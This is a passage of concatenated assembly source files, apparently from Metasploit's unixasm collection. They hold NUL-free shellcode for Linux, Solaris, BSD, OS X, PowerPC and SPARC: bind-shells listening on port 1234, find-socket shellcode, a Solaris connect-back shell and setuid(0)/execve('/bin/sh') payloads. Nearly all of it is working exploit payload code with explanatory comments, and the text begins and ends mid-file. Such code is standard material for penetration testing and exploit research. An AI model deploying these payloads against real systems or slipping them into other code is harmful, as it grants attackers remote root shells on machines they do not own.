* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Socket versions. Used by the socket library when calling _so_socket().
*/
#define SOV_STREAM 0 /* Not a socket - just a stream */
#define SOV_DEFAULT 1 /* Select based on so_default_version */
#define SOV_SOCKSTREAM 2 /* Socket plus streams operations */
#define SOV_SOCKBSD 3 /* Socket with no streams operations */
#define SOV_XPG4_2 4 /* Xnet socket */
.global _start
_start:
# 95 bytes
# Solaris/x86 bind-shell.  syscallcode decodes a `lcall $0x27,$0x0;
# ret` syscall gate on the stack (the bytes are stored NOT-ed,
# presumably to avoid NUL bytes) and leaves its address in %esi; every
# syscall below is `call *%esi` with the number in %al and args pushed.
syscallcode:
pushl $0x3cffd8ff
pushl $0x65
movl %esp,%esi
notl 0x04(%esi)
notb (%esi)
bndsockcode:
# sockaddr_in: 0xd20402ff = {0xff, AF_INET, port 1234}, address 0
xorl %eax,%eax
pushl %eax
pushl $0xd20402ff
movl %esp,%edi
# so_socket(AF_INET=2, SOCK_STREAM=2, 0, 0, SOV_SOCKSTREAM) --
# syscall 0xe6 (230); note SOCK_STREAM is 2 on Solaris
pushl $0x02 /* SOV_SOCKSTREAM */
pushl %eax
pushl %eax
pushl $0x02
pushl $0x02 /* Used as SOV_SOCKSTREAM when calling bind() */
movb $0xe6,%al
call *%esi
# bind(fd, edi, 0x10, ...) -- syscall 0xe8 (232); the leftover 0x02
# above serves as the version argument (see comment)
pushl $0x10
pushl %edi
pushl %eax
xorl %eax,%eax
movb $0xe8,%al
call *%esi
# listen -- 0xe9 (233) -- then accept -- 0xea (234), reusing stack
# slots; ebx = listening fd, eax = accepted connection fd
popl %ebx
pushl %eax
pushl %eax
pushl %ebx
movb $0xe9,%al
call *%esi
movb $0xea,%al
call *%esi
# fcntl(conn, 0x09 = F_DUP2FD, n) loop -- syscall 0x3e (62); the
# counter lives in the stale slot at edi-0x28
pushl $0x09
pushl %eax
0:
pushl $0x3e
popl %eax
call *%esi
decl -0x28(%edi)
jns 0b
shellcode:
# execve("/bin//sh", {path, NULL}, NULL) -- syscall 0x3b (59);
# eax is already 0 here, hence the commented-out zeroing
# xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %ebx
movl %esp,%ecx
pushl %eax
pushl %ecx
pushl %ebx
movb $0x3b,%al
call *%esi
|
OpenWireSec/metasploit | 1,792 | external/source/unixasm/lin-x86-bndsockcode.s | /*
* lin-x86-bndsockcode.s
* Copyright 2004 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
# Linux/x86 bind-shell: socket/bind(*:1234)/listen/accept via
# socketcall (0x66), dup2() the connection onto low fds, execve sh.
.global _start
_start:
# 78 bytes
bndsockcode:
# socketcall(SYS_SOCKET=1, {AF_INET=2, SOCK_STREAM=1, 0});
# mull zeroes edx:eax
xorl %ebx,%ebx
mull %ebx
pushl %ebx
incl %ebx
pushl %ebx
pushl $0x02
movl %esp,%ecx
movb $0x66,%al
int $0x80
# pops realign esp so the sockaddr lands exactly at ecx: edx (0) is
# sin_addr (INADDR_ANY); 0xd20402ff carries port 1234 -- its 0xff low
# byte falls in sin_family, which Linux inet bind does not check,
# presumably chosen to avoid NUL bytes -- then push {fd, &addr, 0x10};
# ebx = 2 = SYS_BIND
popl %ebx
popl %esi
pushl %edx
pushl $0xd20402ff
pushl $0x10
pushl %ecx
pushl %eax
movl %esp,%ecx
pushl $0x66
popl %eax
int $0x80
# zero the &addr slot (bind returned 0) so listen's backlog is 0;
# then SYS_LISTEN (ebx=4) and SYS_ACCEPT (ebx=5) reuse the arg block
movl %eax,0x04(%ecx)
movb $0x04,%bl
movb $0x66,%al
int $0x80
incl %ebx
movb $0x66,%al
int $0x80
# ebx = connection fd; ecx counts down from the old socket fd:
# dup2(conn, n) -- syscall 0x3f (63)
xchgl %eax,%ebx
popl %ecx
0:
pushl $0x3f
popl %eax
int $0x80
decl %ecx
jns 0b
shellcode:
# execve("/bin//sh") -- syscall 0x0b; eax is 0 (dup2 return), edx is
# still 0 from mull, and a zero word already tops the stack as the
# string terminator -- hence the commented-out instructions
# xorl %eax,%eax
# pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %ebx
movl %esp,%ecx
# cltd
movb $0x0b,%al
int $0x80
|
OpenWireSec/metasploit | 2,045 | external/source/unixasm/sol-sparc-bndsockcode.s | /*
* sol-sparc-bndsockcode.s
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
# Solaris/SPARC bind-shell: so_socket/bind(*:1234)/listen/accept, then
# fcntl(F_DUP2FD) the connection onto fds 2..0 and execve("/bin/sh").
# Syscall number in %g1, trap via `ta 0x08`.
.globl _start
_start:
# 00 bytes
bndsockcode:
# so_socket
# so_socket(AF_INET=2, SOCK_STREAM=2, 0, 0, SOV=2) -- syscall 0xe6
# (230); the listening fd is saved at [%sp-0x08]
mov 0x02,%o4
xor %o3,%o3,%o3
xor %o2,%o2,%o2
mov 0x02,%o1
mov 0x02,%o0
mov 0xe6,%g1
ta 0x08
st %o0,[%sp-0x08]
# bind
# sockaddr built NUL-free: 0x204d2fff >> 12 = 0x000204d2 =
# {AF_INET, port 1234}; address word is 0 (INADDR_ANY); o1 = &addr,
# o2 = 16 = addrlen, o3 = 2 (version) -- syscall 0xe8 (232)
set 0x204d2fff,%l0
srl %l0,12,%l0
mov 0x02,%o3
mov 0x10,%o2
st %l0,[%sp-0x10]
st %g0,[%sp-0x0c]
sub %sp,0x10,%o1
mov 0xe8,%g1
ta 0x08
# listen
# listen(sock, 5) -- syscall 0xe9 (233)
mov 0x05,%o1
ld [%sp-0x08],%o0
mov 0xe9,%g1
ta 0x08
# accept
# accept(sock, NULL, NULL) -- syscall 0xea (234); the connection fd
# is saved at [%sp-0x04]
xor %o2,%o2,%o2
xor %o1,%o1,%o1
ld [%sp-0x08],%o0
mov 0xea,%g1
ta 0x08
st %o0,[%sp-0x04]
# fcntl
# fcntl(conn, 0x09 = F_DUP2FD, n) for n = 2, 1, 0 -- syscall 0x3e
# (62); the annulled delay slot reloads the connection fd only when
# the loop is taken again
mov 0x03,%o2
0:
subcc %o2,1,%o2
mov 0x09,%o1
mov 0x3e,%g1
ta 0x08
bnz,a 0b
ld [%sp-0x04],%o0
shellcode:
# execve("/bin/sh", {path, NULL}, NULL) -- syscall 0x3b (59);
# "/bin" and "/sh\0" assembled in %l0/%l1 and stored below %sp
xor %o2,%o2,%o2
sethi %hi(0x2f62696e),%l0
or %l0,0x96e,%l0
sethi %hi(0x2f736800),%l1
std %l0,[%sp-0x08]
sub %sp,0x08,%o0
st %o0,[%sp-0x10]
st %g0,[%sp-0x0c]
sub %sp,0x10,%o1
mov 0x3b,%g1
ta 0x08
|
OpenWireSec/metasploit | 2,109 | external/source/unixasm/lin-power-fndsockcode.S | /*
* lin-power-fndsockcode.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include "linux-power.h"
# Linux/PowerPC (32-bit) find-socket shellcode: walk fds with
# getpeername() via socketcall until the peer port is 1234, dup2() the
# match onto fds 2..0, then execve("/bin/sh").  Syscalls use the
# presumably NUL-free `sc` encoding .long 0x44ffff02.
.globl main
main:
fndsockcode:
# r31 = candidate fd (starts 0); r29 = __CAL (presumably 511)
xor %r31,%r31,%r31
lil %r29,__CAL
# getpeername
# stack layout: a zeroed word at r28 receives the peer sockaddr,
# r26 points at the addrlen word (16); the arg block pushed below is
# {fd, &buf, &len} with the fd slot rewritten each iteration
stu %r31,-4(%r1)
mr %r28,%r1
cal %r27,-511+16(%r29)
stu %r27,-4(%r1)
mr %r26,%r1
stu %r26,-4(%r1)
stu %r28,-4(%r1)
stu %r31,-4(%r1)
0:
# fd += 1; pop and re-push the fd slot, then
# socketcall(SYS_getpeername, args)
cal %r31,511(%r31)
cal %r31,-511+1(%r31)
cal %r1,511(%r1)
cal %r1,-511+4(%r1)
stu %r31,-4(%r1)
mr %r4,%r1
cal %r3,__NC_getpeername(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
# sin_port is the big-endian halfword at buf+2; loop until it is 1234
cal %r25,511(%r28)
lhz %r25,-511+2(%r25)
cmpli 0,%r25,1234
bne 0b
cal %r24,-511+2(%r29)
1:
# dup2
# dup2(found_fd, n) for n = 2, 1, 0
mr %r4,%r24
mr %r3,%r31
cal %r0,__NC_dup2(%r29)
.long 0x44ffff02
ai. %r24,%r24,-1
bge 1b
shellcode:
# lil %r31,__CAL
# execve("/bin/sh"): bnel updates LR even when not taken; the string
# sits 36 bytes past the captured return address, NUL-written at +43
xor. %r5,%r5,%r5
bnel shellcode
mflr %r30
cal %r30,511(%r30)
cal %r3,-511+36(%r30)
stb %r5,-511+43(%r30)
# argv = {path, NULL}; envp (r5) = 0
stu %r5,-4(%r1)
stu %r3,-4(%r1)
mr %r4,%r1
# cal %r0,__NC_execve(%r31)
cal %r0,__NC_execve(%r29)
.long 0x44ffff02
.asciz "/bin/sh"
|
OpenWireSec/metasploit | 1,576 | external/source/unixasm/sol-x86-shellcode.s | /*
* sol-x86-shellcode.s
* Copyright 2004 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
# Solaris/x86 shellcode fragments.  syscallcode decodes a
# `lcall $0x27,$0x0; ret` syscall gate on the stack (bytes stored
# NOT-ed, presumably to avoid NULs); %esi holds its address and each
# call is `call *%esi` with the syscall number in %al.
.global _start
_start:
syscallcode:
pushl $0x3cffd8ff
pushl $0x65
movl %esp,%esi
notl 0x04(%esi)
notb (%esi)
setreuidcode:
# setreuid(0, 0) -- syscall 0xca (202)
xorl %eax,%eax
pushl %eax
pushl %eax
movb $0xca,%al
call *%esi
setuidcode:
# setuid(0) -- syscall 0x17 (23)
xorl %eax,%eax
pushl %eax
movb $0x17,%al
call *%esi
exitcode:
# exit(0) -- syscall 1
xorl %eax,%eax
pushl %eax
movb $0x01,%al
call *%esi
# 26 bytes
shellcode:
# execve("/bin//sh", {path, NULL}, NULL) -- syscall 0x3b (59);
# ebx = path, ecx = argv, the first pushed 0 is envp
xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %ebx
movl %esp,%ecx
pushl %eax
pushl %ecx
pushl %ebx
movb $0x3b,%al
call *%esi
|
OpenWireSec/metasploit | 1,594 | external/source/unixasm/bsd-x86-fndsockcode.s | /*
* bsd-x86-fndsockcode.s
* Copyright 2006 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
# BSD/x86 find-socket shellcode: scan fds with getpeername() until the
# peer port is 1234, dup2() the match onto low fds, execve("/bin//sh").
.global _start
_start:
# 60 bytes
fndsockcode:
# build getpeername args {fd, &buf (edi), &len}; pushl %esp takes the
# address of the 0x10 just pushed as the addrlen pointer
xorl %eax,%eax
pushl %eax
movl %esp,%edi
pushl $0x10
pushl %esp
pushl %edi
pushl %eax
pushl %eax
0:
# pop the dummy slot and the fd, increment the fd, re-push both, then
# getpeername -- syscall 0x1f (31)
popl %eax
popl %eax
incl %eax
pushl %eax
pushl %eax
pushl $0x1f
popl %eax
int $0x80
# sin_port at edi+2: 0xd204 is port 1234 in network byte order
cmpw $0xd204,0x02(%edi)
jne 0b
# dup2(fd, n) loop -- syscall 0x5a (90); the matched fd's own stack
# slot at edi-0x10 doubles as the countdown target.  The pushl %eax
# pushes 0 (getpeername's return) -- later the string terminator.
pushl %eax
1:
pushl $0x5a
popl %eax
int $0x80
decl -0x10(%edi)
jns 1b
shellcode:
# execve("/bin//sh", argv, NULL) -- syscall 0x3b (59); eax is 0
# (dup2(fd,0) return) and the zero terminator already tops the stack,
# hence the commented-out instructions
# xorl %eax,%eax
# pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %esp
pushl %ebx
pushl %eax
movb $0x3b,%al
int $0x80
|
OpenWireSec/metasploit | 1,703 | external/source/unixasm/osx-x86-bndsockcode.s | /*
* osx-x86-bndsockcode.s
* Copyright 2006 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
# Mac OS X/x86 bind-shell: socket/bind(*:1234)/listen/accept, dup2()
# the connection onto low fds, then execve("/bin//sh").  Stack slots
# from earlier calls are deliberately reused as later arguments.
.global _start
_start:
# 74 bytes
bndsockcode:
# sockaddr_in on the stack: 0xd20402ff = {sin_len 0xff, AF_INET,
# port 1234}, address word 0 (INADDR_ANY); edi = &sockaddr
xorl %eax,%eax
pushl %eax
pushl $0xd20402ff
movl %esp,%edi
# socket(AF_INET=2, SOCK_STREAM=1, 0) -- syscall 0x61 (97); the 0x10
# pushed last fills the dummy return slot and later serves as addrlen
pushl %eax
pushl $0x01
pushl $0x02
pushl $0x10
movb $0x61,%al
int $0x80
# bind(fd, edi, 0x10) -- syscall 0x68 (104)
pushl %edi
pushl %eax
pushl %eax
pushl $0x68
popl %eax
int $0x80
# stash the fd into the stale arg slot at edi-0x14, then listen --
# 0x6a (106) -- and accept -- 0x1e (30) -- reuse the argument block
movl %eax,-0x14(%edi)
movb $0x6a,%al
int $0x80
movb $0x1e,%al
int $0x80
# dup2(conn, n) loop -- syscall 0x5a (90); the counter at edi-0x1c is
# the second pushed copy of the connection fd, counted down to 0
pushl %eax
pushl %eax
0:
pushl $0x5a
popl %eax
int $0x80
decl -0x1c(%edi)
jns 0b
shellcode:
# execve("/bin//sh") -- syscall 0x3b (59); eax is already 0 (dup2
# return), hence the commented-out zeroing; note the doubled
# pushl %esp used by this variant's argument block
# xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %esp
pushl %esp
pushl %ebx
pushl %eax
movb $0x3b,%al
int $0x80
|
OpenWireSec/metasploit | 1,616 | external/source/unixasm/osx-x86-shellcode.s | /*
* osx-x86-shellcode.s
* Copyright 2006 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
# Mac OS X/x86 shellcode fragments.  BSD-style syscalls read arguments
# from the stack above a dummy return-address slot, hence the extra
# pushes before each int $0x80.
.global _start
_start:
setresuidcode:
# setresuid(0, 0, 0) -- syscall 0x0137 (311)
xorl %eax,%eax
pushl %eax
pushl %eax
pushl %eax
pushl %eax
movw $0x0137,%ax
int $0x80
setreuidcode:
# setreuid(0, 0) -- syscall 0x7e (126)
xorl %eax,%eax
pushl %eax
pushl %eax
pushl %eax
movb $0x7e,%al
int $0x80
setuidcode:
# setuid(0) -- syscall 0x17 (23)
xorl %eax,%eax
pushl %eax
pushl %eax
movb $0x17,%al
int $0x80
exitcode:
# exit(0) -- syscall 1
xorl %eax,%eax
pushl %eax
movb $0x01,%al
int $0x80
# 24 bytes
shellcode:
# execve("/bin//sh") -- syscall 0x3b (59); note the doubled
# pushl %esp in this OS X variant's argument block (cf. the single
# push in the plain BSD version)
xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %esp
pushl %esp
pushl %ebx
pushl %eax
movb $0x3b,%al
int $0x80
|
OpenWireSec/metasploit | 2,253 | external/source/unixasm/sol-x86-cntsockcode.s | /*
* sol-x86-cntsockcode.s
* Copyright 2004 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Socket versions. Used by the socket library when calling _so_socket().
*/
#define SOV_STREAM 0 /* Not a socket - just a stream */
#define SOV_DEFAULT 1 /* Select based on so_default_version */
#define SOV_SOCKSTREAM 2 /* Socket plus streams operations */
#define SOV_SOCKBSD 3 /* Socket with no streams operations */
#define SOV_XPG4_2 4 /* Xnet socket */
.global _start
_start:
# 91 bytes
# Solaris/x86 reverse ("connect-back") shell to 127.1.1.1:1234.
syscallcode:
# Build an 8-byte syscall stub on the stack without NUL bytes:
# the two pushed constants are bitwise-NOTed in place to become
#   9a 00 00 00 00 27 00   lcall $0x27,$0   (Solaris syscall call gate)
#   c3                     ret
# Every syscall below is then made via "call *%esi".
pushl $0x3cffd8ff
pushl $0x65
movl %esp,%esi                          # esi = &stub
notl 0x04(%esi)                         # ff d8 ff 3c -> 00 27 00 c3
notb (%esi)                             # 0x65 -> 0x9a (lcall opcode)
cntsockcode:
# sockaddr_in for 127.1.1.1:1234 (NUL-free encoding of 127.0.0.1 variant)
pushl $0x0101017f                       # sin_addr = 127.1.1.1
pushw $0xd204                           # sin_port = 1234 (big-endian 0x04d2)
pushw $0x02                             # sin_family = AF_INET
movl %esp,%edi                          # edi = &sockaddr_in
# so_socket(AF_INET, SOCK_STREAM, 0, NULL, SOV_SOCKSTREAM)
pushl $0x02 /* SOV_SOCKSTREAM */
xorl %eax,%eax
pushl %eax                              # devpath = NULL
pushl %eax                              # protocol = 0
pushl $0x02                             # type = SOCK_STREAM (2 on Solaris)
pushl $0x02 /* Used as SOV_SOCKSTREAM when calling connect() */
movb $0xe6,%al                          # 0xe6 = 230 = SYS_so_socket
call *%esi
# connect(s, &sockaddr_in, 0x10, SOV_SOCKSTREAM)
pushl $0x10                             # addrlen
pushl %edi                              # addr
pushl %eax                              # s (socket fd)
xorl %eax,%eax
movb $0xeb,%al                          # 0xeb = 235 = SYS_connect
call *%esi
# fcntl(s, F_DUP2FD, n) loop: duplicate the socket onto low fds
popl %ebx                               # ebx = socket fd (left on the stack above)
pushl %ebx                              # arg slot, decremented by the loop below
pushl $0x09                             # F_DUP2FD
pushl %ebx                              # fd
0:
pushl $0x3e
popl %eax                               # eax = 62 = SYS_fcntl (NUL-free load)
call *%esi
decl -0x20(%edi)                        # count the target fd down
jns 0b
shellcode:
# xorl %eax,%eax
# execve("/bin//sh", argv = {path, NULL}, envp = NULL)
# NOTE(review): this stub traps with int $0x80 instead of the lcall stub
# used above -- confirm against the Solaris trap interface in use.
pushl %eax                              # string terminator
pushl $0x68732f2f                       # "//sh"
pushl $0x6e69622f                       # "/bin"
movl %esp,%ebx                          # ebx = path
pushl %eax                              # argv[1] = NULL
pushl %ebx                              # argv[0] = path
movl %esp,%ecx                          # ecx = argv
pushl %eax                              # envp = NULL
pushl %ecx                              # argv
pushl %ebx                              # path
movb $0x3b,%al                          # 59 = SYS_execve
int $0x80
|
OpenWireSec/metasploit | 1,826 | external/source/unixasm/lin-power-shellcode.S | /*
* lin-power-shellcode.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include "linux-power.h"
.globl main
main:
# Linux/PowerPC (32-bit) execve("/bin/sh") shellcode, written with AIX-style
# extended mnemonics (lil=li, cal=addi, stu=stwu) so every instruction
# encodes without NUL bytes.  ".long 0x44ffff02" is the "sc" instruction
# with its reserved bits set -- same effect, NUL-free encoding.
# __CAL is a bias constant from linux-power.h (presumably 511, since code
# elsewhere in this family uses matching -511+n offsets -- TODO confirm).
#ifdef ALL
setresuidcode:
# setresuid(0, 0, 0)
lil %r31,__CAL
xor %r5,%r5,%r5
xor %r4,%r4,%r4
xor %r3,%r3,%r3
cal %r0,__NC_setresuid(%r31)
.long 0x44ffff02
setreuidcode:
# setreuid(0, 0)
lil %r31,__CAL
xor %r4,%r4,%r4
xor %r3,%r3,%r3
cal %r0,__NC_setreuid(%r31)
.long 0x44ffff02
setuidcode:
# setuid(0)
lil %r31,__CAL
xor %r3,%r3,%r3
cal %r0,__NC_setuid(%r31)
.long 0x44ffff02
#endif
shellcode:
lil %r31,__CAL
# GetPC trick: "bnel" is never taken (xor. set CR0.EQ) but a conditional
# branch with LK=1 still writes LR, so LR = address of the mflr below.
xor. %r5,%r5,%r5
bnel shellcode
mflr %r30
cal %r30,511(%r30)                      # +511/-511 split keeps offsets NUL-free
cal %r3,-511+36(%r30)                   # r3 = &"/bin/sh" (36 bytes past mflr)
stb %r5,-511+43(%r30)                   # write the string's NUL terminator
stu %r5,-4(%r1)                         # push argv[1] = NULL
stu %r3,-4(%r1)                         # push argv[0] = path
mr %r4,%r1                              # r4 = argv
cal %r0,__NC_execve(%r31)
.long 0x44ffff02                        # sc: execve(path, argv, NULL)
.asciz "/bin/sh"
#ifdef ALL
exitcode:
# exit(0)
lil %r31,__CAL
xor %r3,%r3,%r3
cal %r0,__NC_exit(%r31)
.long 0x44ffff02
#endif
|
OpenWireSec/metasploit | 2,624 | external/source/unixasm/lin-power-bndsockcode.S | /*
* lin-power-bndsockcode.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include "linux-power.h"
.globl main
main:
# Linux/PowerPC (32-bit) bind-shell on port 1234.  All socket operations go
# through sys_socketcall(call, args): r3 = sub-call number, r4 = pointer to
# an argument array built on the stack.  ".long 0x44ffff02" is a NUL-free
# encoding of "sc"; AIX-style mnemonics (lil/cal/liu/oril/stu) keep the
# rest of the encoding NUL-free as well.
bndsockcode:
xor %r31,%r31,%r31                      # r31 = 0
lil %r29,__CAL                          # r29 = bias constant (see linux-power.h)
# socket
cal %r28,-511+1(%r29)                   # r28 = 1 = SOCK_STREAM
cal %r27,-511+2(%r29)                   # r27 = 2 = AF_INET (later: fd counter)
stu %r31,-4(%r1)                        # args[2] = protocol = 0
stu %r28,-4(%r1)                        # args[1] = SOCK_STREAM
stu %r27,-4(%r1)                        # args[0] = AF_INET
mr %r4,%r1                              # r4 = args
cal %r3,__NC_socket(%r29)               # r3 = SYS_SOCKET sub-call
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02                        # sc
mr %r26,%r3                             # r26 = listening socket fd
# bind
cal %r25,-511+16(%r29)                  # r25 = 16 = sizeof(struct sockaddr_in)
/*
* The following GPRs result in zeros when used with liu instruction.
* %r24, %r16, %r8, %r0
*
*/
liu %r23,0xff02                         # sin_family: AF_INET (0x0002) with junk
oril %r23,%r23,0x04d2                   # high byte to stay NUL-free; port 1234
stu %r31,-4(%r1)                        # sin_addr = INADDR_ANY (+ padding)
stu %r23,-4(%r1)                        # family/port word (big-endian layout)
mr %r22,%r1                             # r22 = &sockaddr_in
stu %r25,-4(%r1)                        # args[2] = addrlen
stu %r22,-4(%r1)                        # args[1] = &sockaddr_in
stu %r26,-4(%r1)                        # args[0] = fd
mr %r4,%r1
cal %r3,__NC_bind(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
# listen
stu %r31,-4(%r1)                        # args[2] = 0 (unused)
stu %r31,-4(%r1)                        # args[1] = backlog = 0
stu %r26,-4(%r1)                        # args[0] = fd
mr %r4,%r1
cal %r3,__NC_listen(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
# accept -- reuses the same argument array (fd, 0, 0)
mr %r4,%r1
cal %r3,__NC_accept(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
mr %r21,%r3                             # r21 = connected client fd
0:
# dup2(client, n) for n = 2,1,0: attach stdio to the socket
mr %r4,%r27
mr %r3,%r21
cal %r0,__NC_dup2(%r29)
.long 0x44ffff02
ai. %r27,%r27,-1
bge 0b
shellcode:
# lil %r31,__CAL
# execve("/bin/sh") -- GetPC via never-taken bnel (LK=1 always writes LR)
xor. %r5,%r5,%r5
bnel shellcode
mflr %r30
cal %r30,511(%r30)
cal %r3,-511+36(%r30)                   # r3 = &"/bin/sh"
stb %r5,-511+43(%r30)                   # terminate the string
stu %r5,-4(%r1)                         # argv[1] = NULL
stu %r3,-4(%r1)                         # argv[0] = path
mr %r4,%r1                              # r4 = argv
# cal %r0,__NC_execve(%r31)
cal %r0,__NC_execve(%r29)
.long 0x44ffff02
.asciz "/bin/sh"
|
OpenWireSec/metasploit | 1,307 | external/source/unixasm/sco-x86-shellcode.s | /*
* sco-x86-shellcode.s
* Copyright 2004 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
# SCO/x86 setuid(0) + execve("/bin//sh") shellcode.
syscallcode:
